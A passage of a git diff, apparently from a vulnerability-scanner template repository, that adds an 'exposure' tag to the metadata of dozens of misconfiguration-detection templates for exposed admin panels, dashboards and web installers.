-11,7 +11,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe + tags: misconfig,aem,adobe,exposure http: - method: GET diff --git a/http/misconfiguration/aem/aem-misc-admin.yaml b/http/misconfiguration/aem/aem-misc-admin.yaml index 2d6b3f46e8..5078301e8a 100644 --- a/http/misconfiguration/aem/aem-misc-admin.yaml +++ b/http/misconfiguration/aem/aem-misc-admin.yaml @@ -12,7 +12,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe + tags: misconfig,aem,adobe,exposure http: - method: GET diff --git a/http/misconfiguration/aem/aem-secrets.yaml b/http/misconfiguration/aem/aem-secrets.yaml index 2c22854abc..0eab636ffc 100644 --- a/http/misconfiguration/aem/aem-secrets.yaml +++ b/http/misconfiguration/aem/aem-secrets.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 2 verified: true - tags: aem,adobe,misconfig + tags: aem,adobe,misconfig,exposure http: - method: GET diff --git a/http/misconfiguration/aem/aem-security-users.yaml b/http/misconfiguration/aem/aem-security-users.yaml index b071d7d310..598dd877a0 100644 --- a/http/misconfiguration/aem/aem-security-users.yaml +++ b/http/misconfiguration/aem/aem-security-users.yaml @@ -11,7 +11,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe + tags: misconfig,aem,adobe,exposure http: - method: GET diff --git a/http/misconfiguration/aem/aem-sling-userinfo.yaml b/http/misconfiguration/aem/aem-sling-userinfo.yaml index da282ebf18..5b804c10fc 100644 --- a/http/misconfiguration/aem/aem-sling-userinfo.yaml +++ b/http/misconfiguration/aem/aem-sling-userinfo.yaml @@ -11,7 +11,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe + tags: misconfig,aem,adobe,exposure http: - method: GET diff --git a/http/misconfiguration/ampache-update-exposure.yaml b/http/misconfiguration/ampache-update-exposure.yaml index 1140c34725..d5c8068cee 100644 --- a/http/misconfiguration/ampache-update-exposure.yaml +++ b/http/misconfiguration/ampache-update-exposure.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"Ampache Update" - tags: misconfig,ampache + tags: misconfig,ampache,exposure http: - method: GET diff --git a/http/misconfiguration/apache-drill-exposure.yaml b/http/misconfiguration/apache-drill-exposure.yaml index c2d50e6d6e..69c86b5874 100644 --- a/http/misconfiguration/apache-drill-exposure.yaml +++ b/http/misconfiguration/apache-drill-exposure.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Apache Drill" - tags: misconfig,apache,drill + tags: misconfig,exposure,apache,drill http: - method: GET diff --git a/http/misconfiguration/apache-struts-showcase.yaml b/http/misconfiguration/apache-struts-showcase.yaml index e397c7642e..db630a9676 100644 --- a/http/misconfiguration/apache-struts-showcase.yaml +++ b/http/misconfiguration/apache-struts-showcase.yaml @@ -10,7 +10,7 @@ info: max-request: 2 verified: true shodan-query: title:"Struts2 Showcase" - tags: apache,struts,showcase,misconfig + tags: apache,struts,showcase,misconfig,exposure http: - method: GET diff --git a/http/misconfiguration/apache/kafka-manager-unauth.yaml b/http/misconfiguration/apache/kafka-manager-unauth.yaml index bb37222e5d..4d9bccddd7 100644 --- a/http/misconfiguration/apache/kafka-manager-unauth.yaml +++ b/http/misconfiguration/apache/kafka-manager-unauth.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 fofa-query: app="Kafka-Manager" - tags: misconfig,apache,kafka,unauth + tags: misconfig,apache,kafka,unauth,exposure http: - method: GET diff --git a/http/misconfiguration/awstats-listing.yaml b/http/misconfiguration/awstats-listing.yaml index d6d2520b5a..74572a1f9f 100644 --- a/http/misconfiguration/awstats-listing.yaml +++ b/http/misconfiguration/awstats-listing.yaml @@ -5,7 +5,7 @@ info: author: tess severity: low description: Searches for exposed awstats Internal Information. - tags: misconfig,aws,amazon,awstats,oss + tags: misconfig,aws,exposure,amazon,awstats,oss metadata: max-request: 1 diff --git a/http/misconfiguration/blackbox-exporter-metrics.yaml b/http/misconfiguration/blackbox-exporter-metrics.yaml index b849b61ca4..ebeb32639e 100644 --- a/http/misconfiguration/blackbox-exporter-metrics.yaml +++ b/http/misconfiguration/blackbox-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Blackbox Exporter" - tags: blackbox,debug,misconfig + tags: blackbox,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/bootstrap-admin-panel-template.yaml b/http/misconfiguration/bootstrap-admin-panel-template.yaml index b4b3125351..78053feb45 100644 --- a/http/misconfiguration/bootstrap-admin-panel-template.yaml +++ b/http/misconfiguration/bootstrap-admin-panel-template.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Dashboard - Bootstrap Admin Template" - tags: bootstrap,panel,misconfig + tags: bootstrap,panel,misconfig,exposure http: - method: GET diff --git a/http/misconfiguration/cadvisor-exposure.yaml b/http/misconfiguration/cadvisor-exposure.yaml index 10ce627942..bdb9b22b8e 100644 --- a/http/misconfiguration/cadvisor-exposure.yaml +++ b/http/misconfiguration/cadvisor-exposure.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"cAdvisor" - tags: misconfig,dashboard + tags: exposure,misconfig,dashboard http: - method: GET diff --git a/http/misconfiguration/clockwork-dashboard-exposure.yaml b/http/misconfiguration/clockwork-dashboard-exposure.yaml index e870322540..e920d4ecb8 100644 --- a/http/misconfiguration/clockwork-dashboard-exposure.yaml +++ b/http/misconfiguration/clockwork-dashboard-exposure.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/clockwork-dashboard-exposure.json - tags: unauth,misconfig + tags: exposure,unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/cloud-metadata.yaml b/http/misconfiguration/cloud-metadata.yaml index 207e4685a0..d2a91758ad 100644 --- a/http/misconfiguration/cloud-metadata.yaml +++ b/http/misconfiguration/cloud-metadata.yaml @@ -9,7 +9,7 @@ info: max-request: 1 verified: true shodan-query: html:"instance_metadata" - tags: misconfig,devops,cloud,aws,gcp + tags: misconfig,exposure,devops,cloud,aws,gcp http: - method: GET diff --git a/http/misconfiguration/cobbler-exposed-directory.yaml b/http/misconfiguration/cobbler-exposed-directory.yaml index 5ad934649e..be81a8e068 100644 --- a/http/misconfiguration/cobbler-exposed-directory.yaml +++ b/http/misconfiguration/cobbler-exposed-directory.yaml @@ -5,7 +5,7 @@ info: author: c-sh0 severity: medium description: Searches for exposed Cobbler Directories - tags: cobbler,misconfig + tags: cobbler,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/codemeter-webadmin.yaml b/http/misconfiguration/codemeter-webadmin.yaml index 72195d6e29..47e6c8e0bf 100644 --- a/http/misconfiguration/codemeter-webadmin.yaml +++ b/http/misconfiguration/codemeter-webadmin.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"CodeMeter" - tags: misconfig,codemeter + tags: misconfig,exposure,codemeter http: - method: GET diff --git a/http/misconfiguration/codis-dashboard.yaml b/http/misconfiguration/codis-dashboard.yaml index 62c1f9aff2..71fc8839c5 100644 --- a/http/misconfiguration/codis-dashboard.yaml +++ b/http/misconfiguration/codis-dashboard.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Codis • Dashboard" - tags: misconfig,codis + tags: misconfig,exposure,codis http: - method: GET diff --git a/http/misconfiguration/collectd-exporter-metrics.yaml b/http/misconfiguration/collectd-exporter-metrics.yaml index 66c8381eec..499911533b 100644 --- a/http/misconfiguration/collectd-exporter-metrics.yaml +++ b/http/misconfiguration/collectd-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Collectd Exporter" - tags: collectd,debug,misconfig + tags: collectd,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/confluence-dashboard.yaml b/http/misconfiguration/confluence-dashboard.yaml index bc080433c3..36de53666b 100644 --- a/http/misconfiguration/confluence-dashboard.yaml +++ b/http/misconfiguration/confluence-dashboard.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Dashboard - Confluence" - tags: misconfig,confluence,atlassian + tags: misconfig,exposure,confluence,atlassian http: - method: GET diff --git a/http/misconfiguration/corebos-htaccess.yaml b/http/misconfiguration/corebos-htaccess.yaml index fff4d89992..8ead5802d0 100644 --- a/http/misconfiguration/corebos-htaccess.yaml +++ b/http/misconfiguration/corebos-htaccess.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"corebos" - tags: corebos,huntr,misconfig + tags: exposure,corebos,huntr,misconfig http: - method: GET diff --git a/http/misconfiguration/debug/bottle-debug.yaml b/http/misconfiguration/debug/bottle-debug.yaml index d5ebbaee40..9395cd343d 100644 --- a/http/misconfiguration/debug/bottle-debug.yaml +++ b/http/misconfiguration/debug/bottle-debug.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: html:"Sorry, the requested URL" - tags: bottle,debug,misconfig + tags: bottle,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/debug/flask-werkzeug-debug.yaml b/http/misconfiguration/debug/flask-werkzeug-debug.yaml index bc67b231a2..2c939b53ab 100644 --- a/http/misconfiguration/debug/flask-werkzeug-debug.yaml +++ b/http/misconfiguration/debug/flask-werkzeug-debug.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"Werkzeug powered traceback interpreter" - tags: werkzeug,debug,misconfig + tags: werkzeug,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/dgraph-dashboard-exposure.yaml b/http/misconfiguration/dgraph-dashboard-exposure.yaml index 2cd78dde03..cef5ec1226 100644 --- a/http/misconfiguration/dgraph-dashboard-exposure.yaml +++ b/http/misconfiguration/dgraph-dashboard-exposure.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Dgraph Ratel Dashboard" - tags: unauth,panel,misconfig + tags: exposure,unauth,panel,misconfig http: - method: GET diff --git a/http/misconfiguration/docmosis-tornado-server.yaml b/http/misconfiguration/docmosis-tornado-server.yaml index 0e276861c5..2020932772 100644 --- a/http/misconfiguration/docmosis-tornado-server.yaml +++ b/http/misconfiguration/docmosis-tornado-server.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Docmosis Tornado" - tags: misconfig,tornado + tags: misconfig,tornado,exposure http: - method: GET diff --git a/http/misconfiguration/elastic-hd-dashboard.yaml b/http/misconfiguration/elastic-hd-dashboard.yaml index 4fad731a2b..6217bff003 100644 --- a/http/misconfiguration/elastic-hd-dashboard.yaml +++ b/http/misconfiguration/elastic-hd-dashboard.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Elastic HD Dashboard" - tags: misconfig,elastic + tags: misconfig,exposure,elastic http: - method: GET diff --git a/http/misconfiguration/encompass-cm1-homepage.yaml b/http/misconfiguration/encompass-cm1-homepage.yaml index bbd33edb58..2f8cefda00 100644 --- a/http/misconfiguration/encompass-cm1-homepage.yaml +++ b/http/misconfiguration/encompass-cm1-homepage.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Encompass CM1 Home Page" - tags: misconfig,encompass + tags: misconfig,encompass,exposure http: - method: GET diff --git a/http/misconfiguration/envoy-admin-exposure.yaml b/http/misconfiguration/envoy-admin-exposure.yaml index 9b98d8f07a..a700cb51aa 100644 --- a/http/misconfiguration/envoy-admin-exposure.yaml +++ b/http/misconfiguration/envoy-admin-exposure.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: title:"Envoy Admin" - tags: misconfig,envoy + tags: misconfig,envoy,exposure http: - method: GET diff --git a/http/misconfiguration/espeasy-mega-exposure.yaml b/http/misconfiguration/espeasy-mega-exposure.yaml index 9e34f90548..d3b519eb46 100644 --- a/http/misconfiguration/espeasy-mega-exposure.yaml +++ b/http/misconfiguration/espeasy-mega-exposure.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"ESP Easy Mega" - tags: misconfig,espeasy + tags: misconfig,espeasy,exposure http: - method: GET diff --git a/http/misconfiguration/esphome-dashboard.yaml b/http/misconfiguration/esphome-dashboard.yaml index 5ee7d62cb5..1459230a30 100644 --- a/http/misconfiguration/esphome-dashboard.yaml +++ b/http/misconfiguration/esphome-dashboard.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: title:"Dashboard - ESPHome" - tags: misconfig,esphome,iot + tags: misconfig,esphome,exposure,iot http: - method: GET diff --git a/http/misconfiguration/everything-listing.yaml b/http/misconfiguration/everything-listing.yaml index 71d47d833b..a2850b27d0 100644 --- a/http/misconfiguration/everything-listing.yaml +++ b/http/misconfiguration/everything-listing.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: 'true' shodan-query: http.favicon.hash:-977323269 - tags: everything,listing,voidtools,misconfig + tags: exposure,everything,listing,voidtools,misconfig http: - method: GET diff --git a/http/misconfiguration/exposed-jquery-file-upload.yaml b/http/misconfiguration/exposed-jquery-file-upload.yaml index d15ffa7434..01fb075db6 100644 --- a/http/misconfiguration/exposed-jquery-file-upload.yaml +++ b/http/misconfiguration/exposed-jquery-file-upload.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-434 - tags: jquery,edb,misconfig + tags: exposure,jquery,edb,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/exposed-kafdrop.yaml b/http/misconfiguration/exposed-kafdrop.yaml index 0e2a3324fe..a7fbef20bd 100644 --- a/http/misconfiguration/exposed-kafdrop.yaml +++ b/http/misconfiguration/exposed-kafdrop.yaml @@ -4,7 +4,7 @@ info: name: Publicly exposed Kafdrop Interface author: dhiyaneshDk severity: low - tags: misconfig,kafdrop + tags: exposure,misconfig,kafdrop metadata: max-request: 1 diff --git a/http/misconfiguration/front-page-misconfig.yaml b/http/misconfiguration/front-page-misconfig.yaml index ad5a7528a5..c009369d17 100644 --- a/http/misconfiguration/front-page-misconfig.yaml +++ b/http/misconfiguration/front-page-misconfig.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications - tags: misconfig,frontpage + tags: misconfig,exposure,frontpage metadata: max-request: 2 diff --git a/http/misconfiguration/gitlab/gitlab-public-repos.yaml b/http/misconfiguration/gitlab/gitlab-public-repos.yaml index 3b0432bdfe..f3c7441c13 100644 --- a/http/misconfiguration/gitlab/gitlab-public-repos.yaml +++ b/http/misconfiguration/gitlab/gitlab-public-repos.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"GitLab" - tags: gitlab,misconfig + tags: gitlab,exposure,misconfig http: - method: GET diff --git a/http/misconfiguration/gitlab/gitlab-public-snippets.yaml b/http/misconfiguration/gitlab/gitlab-public-snippets.yaml index 842873238e..257786749b 100644 --- a/http/misconfiguration/gitlab/gitlab-public-snippets.yaml +++ b/http/misconfiguration/gitlab/gitlab-public-snippets.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 2 shodan-query: http.title:"GitLab" - tags: gitlab,misconfig + tags: gitlab,exposure,misconfig http: - method: GET diff --git a/http/misconfiguration/global-traffic-statistics.yaml b/http/misconfiguration/global-traffic-statistics.yaml index 3a3bf0adcb..ccbe034b19 100644 --- a/http/misconfiguration/global-traffic-statistics.yaml +++ b/http/misconfiguration/global-traffic-statistics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Global Traffic Statistics" - tags: misconfig,global + tags: misconfig,global,exposure http: - method: GET diff --git a/http/misconfiguration/gocd/gocd-cruise-configuration.yaml b/http/misconfiguration/gocd/gocd-cruise-configuration.yaml index 9705b7f26a..1a54539c2b 100644 --- a/http/misconfiguration/gocd/gocd-cruise-configuration.yaml +++ b/http/misconfiguration/gocd/gocd-cruise-configuration.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" - tags: go,gocd,config,misconfig + tags: go,gocd,config,exposure,misconfig http: - method: GET diff --git a/http/misconfiguration/gocd/gocd-encryption-key.yaml b/http/misconfiguration/gocd/gocd-encryption-key.yaml index ffc1503779..a57722007f 100644 --- a/http/misconfiguration/gocd/gocd-encryption-key.yaml +++ b/http/misconfiguration/gocd/gocd-encryption-key.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" - tags: go,gocd,misconfig + tags: go,gocd,exposure,misconfig http: - method: GET diff --git a/http/misconfiguration/haproxy-exporter-metrics.yaml b/http/misconfiguration/haproxy-exporter-metrics.yaml index b949ba9180..9e34eccc31 100644 --- a/http/misconfiguration/haproxy-exporter-metrics.yaml +++ b/http/misconfiguration/haproxy-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"haproxy exporter" - tags: haproxy,debug,misconfig + tags: haproxy,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/healthchecks-ui-exposure.yaml b/http/misconfiguration/healthchecks-ui-exposure.yaml index a8367fc095..e5c1b2546c 100644 --- a/http/misconfiguration/healthchecks-ui-exposure.yaml +++ b/http/misconfiguration/healthchecks-ui-exposure.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Health Checks UI" - tags: misconfig + tags: misconfig,exposure http: - method: GET diff --git a/http/misconfiguration/hfs-exposure.yaml b/http/misconfiguration/hfs-exposure.yaml index ee819cdd4a..d3617cf526 100644 --- a/http/misconfiguration/hfs-exposure.yaml +++ b/http/misconfiguration/hfs-exposure.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"HFS /" - tags: misconfig,hfs + tags: misconfig,hfs,exposure http: - method: GET diff --git a/http/misconfiguration/ibm-friendly-path-exposure.yaml b/http/misconfiguration/ibm-friendly-path-exposure.yaml index 8fa8f6f88c..60a408ba10 100644 --- a/http/misconfiguration/ibm-friendly-path-exposure.yaml +++ b/http/misconfiguration/ibm-friendly-path-exposure.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 5 shodan-query: http.html:"IBM WebSphere Portal" - tags: ibm,websphere,misconfig + tags: ibm,exposure,websphere,misconfig http: - method: GET diff --git a/http/misconfiguration/ibm-websphere-xml.yaml b/http/misconfiguration/ibm-websphere-xml.yaml index 5c6b2d6257..f57d8a4dfa 100644 --- a/http/misconfiguration/ibm-websphere-xml.yaml +++ b/http/misconfiguration/ibm-websphere-xml.yaml @@ -11,7 +11,8 @@ info: metadata: max-request: 1 verified: true - tags: ibm,websphere,misconfig + tags: ibm,websphere,exposure,misconfig + verified: "true" http: - method: GET diff --git a/http/misconfiguration/installer/acunetix-360-installer.yaml b/http/misconfiguration/installer/acunetix-360-installer.yaml index 361ccb7f4d..4d6a084e40 100644 --- a/http/misconfiguration/installer/acunetix-360-installer.yaml +++ b/http/misconfiguration/installer/acunetix-360-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:-347188002 - tags: misconfig,install,acunetix + tags: misconfig,exposure,install,acunetix http: - method: GET diff --git a/http/misconfiguration/installer/ampache-music-installer.yaml b/http/misconfiguration/installer/ampache-music-installer.yaml index 75d3247c71..0535ad028f 100644 --- a/http/misconfiguration/installer/ampache-music-installer.yaml +++ b/http/misconfiguration/installer/ampache-music-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"For the Love of Music - Installation" - tags: misconfig,ampache,install + tags: misconfig,ampache,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/bagisto-installer.yaml b/http/misconfiguration/installer/bagisto-installer.yaml index 0166de9eed..2529333ecf 100644 --- a/http/misconfiguration/installer/bagisto-installer.yaml +++ b/http/misconfiguration/installer/bagisto-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Bagisto Installer" - tags: misconfig,bagisto,install + tags: misconfig,bagisto,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/binom-installer.yaml b/http/misconfiguration/installer/binom-installer.yaml index 2cda21dc43..618165a29a 100644 --- a/http/misconfiguration/installer/binom-installer.yaml +++ b/http/misconfiguration/installer/binom-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 2 verified: true shodan-query: title:"Install Binom" - tags: misconfig,binom,install + tags: misconfig,binom,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/blesta-installer.yaml b/http/misconfiguration/installer/blesta-installer.yaml index 68ea2b9f97..fe7199aa13 100644 --- a/http/misconfiguration/installer/blesta-installer.yaml +++ b/http/misconfiguration/installer/blesta-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"Blesta installer" - tags: misconfig,blesta,install + tags: misconfig,blesta,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/circarlife-setup.yaml b/http/misconfiguration/installer/circarlife-setup.yaml index 1a274b2ac5..c867aede4c 100644 --- a/http/misconfiguration/installer/circarlife-setup.yaml +++ b/http/misconfiguration/installer/circarlife-setup.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: title:"- setup" html:"Modem setup" - tags: scada,circontrol,circarlife,setup,panel,installer,misconfig + tags: scada,circontrol,circarlife,setup,exposure,panel,installer,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/cloudcenter-Installer.yaml b/http/misconfiguration/installer/cloudcenter-Installer.yaml index 370aa88128..910f57c3eb 100644 --- a/http/misconfiguration/installer/cloudcenter-Installer.yaml +++ b/http/misconfiguration/installer/cloudcenter-Installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"CloudCenter Installer" - tags: misconfig,cisco,cloudcenter,install + tags: misconfig,cisco,cloudcenter,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/codeigniter-installer.yaml b/http/misconfiguration/installer/codeigniter-installer.yaml index c57ab68c1c..e73562e35b 100644 --- a/http/misconfiguration/installer/codeigniter-installer.yaml +++ b/http/misconfiguration/installer/codeigniter-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Codeigniter Application Installer" - tags: misconfig,codeigniter,install + tags: misconfig,codeigniter,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/concrete-installer.yaml b/http/misconfiguration/installer/concrete-installer.yaml index 0d0901d4d0..0b33750992 100644 --- a/http/misconfiguration/installer/concrete-installer.yaml +++ b/http/misconfiguration/installer/concrete-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Install concrete" - tags: misconfig,install,concrete + tags: misconfig,exposure,install,concrete http: - method: GET diff --git a/http/misconfiguration/installer/contentify-installer.yaml b/http/misconfiguration/installer/contentify-installer.yaml index ce64c6b387..3dbb8f34c9 100644 --- a/http/misconfiguration/installer/contentify-installer.yaml +++ b/http/misconfiguration/installer/contentify-installer.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 verified: true - tags: misconfig,contentify,install + tags: misconfig,contentify,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/dokuwiki-installer.yaml b/http/misconfiguration/installer/dokuwiki-installer.yaml index 1a67a856f3..3cb902dba1 100644 --- a/http/misconfiguration/installer/dokuwiki-installer.yaml +++ b/http/misconfiguration/installer/dokuwiki-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"DokuWiki" - tags: misconfig,dokuwiki,install + tags: misconfig,dokuwiki,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/dolibarr-installer.yaml b/http/misconfiguration/installer/dolibarr-installer.yaml index c3c43a9e3c..96a6232690 100644 --- a/http/misconfiguration/installer/dolibarr-installer.yaml +++ b/http/misconfiguration/installer/dolibarr-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Dolibarr install or upgrade" - tags: misconfig,install + tags: misconfig,exposure,install http: - method: GET diff --git a/http/misconfiguration/installer/eshop-installer.yaml b/http/misconfiguration/installer/eshop-installer.yaml index 93f1fa7639..46a67f0c76 100644 --- a/http/misconfiguration/installer/eshop-installer.yaml +++ b/http/misconfiguration/installer/eshop-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"eShop Installer" - tags: misconfig,eshop,install + tags: misconfig,eshop,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/espeasy-installer.yaml b/http/misconfiguration/installer/espeasy-installer.yaml index 2907943719..b61c46ac71 100644 --- a/http/misconfiguration/installer/espeasy-installer.yaml +++ b/http/misconfiguration/installer/espeasy-installer.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 verified: true - tags: misconfig,espeasy,install + tags: misconfig,espeasy,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/facturascripts-installer.yaml b/http/misconfiguration/installer/facturascripts-installer.yaml index 8b7eee5e88..b591c7d21d 100644 --- a/http/misconfiguration/installer/facturascripts-installer.yaml +++ b/http/misconfiguration/installer/facturascripts-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"FacturaScripts installer" - tags: misconfig,facturascripts,install + tags: misconfig,facturascripts,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/geniusocean-installer.yaml b/http/misconfiguration/installer/geniusocean-installer.yaml index 1aac71c445..8946af1ba7 100644 --- a/http/misconfiguration/installer/geniusocean-installer.yaml +++ b/http/misconfiguration/installer/geniusocean-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"GeniusOcean Installer" - tags: misconfig,geniusocean,install + tags: misconfig,geniusocean,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/getsimple-installation.yaml b/http/misconfiguration/installer/getsimple-installation.yaml index d5c8a39f86..ba766a1e3c 100644 --- a/http/misconfiguration/installer/getsimple-installation.yaml +++ b/http/misconfiguration/installer/getsimple-installation.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-284 reference: - http://get-simple.info/ - tags: getsimple,installer,misconfig + tags: getsimple,exposure,installer,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/installer/gogs-installer.yaml b/http/misconfiguration/installer/gogs-installer.yaml index 44fc2f4313..0da4cef821 100644 --- a/http/misconfiguration/installer/gogs-installer.yaml +++ b/http/misconfiguration/installer/gogs-installer.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Installation - Gogs" - tags: misconfig,gogs,install + tags: misconfig,exposure,gogs,install http: - method: GET diff --git a/http/misconfiguration/installer/impresspages-installer.yaml b/http/misconfiguration/installer/impresspages-installer.yaml index ed44cb73ba..7340eadade 100644 --- a/http/misconfiguration/installer/impresspages-installer.yaml +++ b/http/misconfiguration/installer/impresspages-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"ImpressPages installation wizard" - tags: misconfig,install,impresspages + tags: misconfig,exposure,install,impresspages http: - method: GET diff --git a/http/misconfiguration/installer/lmszai-installer.yaml b/http/misconfiguration/installer/lmszai-installer.yaml index 597755eed8..7484b0ff0c 100644 --- a/http/misconfiguration/installer/lmszai-installer.yaml +++ b/http/misconfiguration/installer/lmszai-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"LMSZAI - Learning Management System" - tags: misconfig,blesta,install + tags: misconfig,blesta,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/lychee-installer.yaml b/http/misconfiguration/installer/lychee-installer.yaml index 44b9c9e79d..6ca930ddc4 100644 --- a/http/misconfiguration/installer/lychee-installer.yaml +++ b/http/misconfiguration/installer/lychee-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"Lychee-installer" - tags: misconfig,lychee,install + tags: misconfig,lychee,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/magento-installer.yaml b/http/misconfiguration/installer/magento-installer.yaml index c116fd000f..1d6da8466e 100644 --- a/http/misconfiguration/installer/magento-installer.yaml +++ b/http/misconfiguration/installer/magento-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"Magento Installation" - tags: misconfig,magento,install + tags: misconfig,magento,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/magnolia-installer.yaml b/http/misconfiguration/installer/magnolia-installer.yaml index 3413470357..0b5a4315ca 100644 --- a/http/misconfiguration/installer/magnolia-installer.yaml +++ b/http/misconfiguration/installer/magnolia-installer.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: title:"Magnolia Installation" - tags: magnolia,installer,misconfig + tags: magnolia,exposure,installer,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/mcloud-installer.yaml b/http/misconfiguration/installer/mcloud-installer.yaml index 6b469b7123..376263daad 100644 --- a/http/misconfiguration/installer/mcloud-installer.yaml +++ b/http/misconfiguration/installer/mcloud-installer.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"mcloud-installer-web" - tags: panel,mcloud,misconfig + tags: panel,mcloud,exposure,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/moodle-installer.yaml b/http/misconfiguration/installer/moodle-installer.yaml index c2ba14e021..5fafee21b0 100644 --- a/http/misconfiguration/installer/moodle-installer.yaml +++ 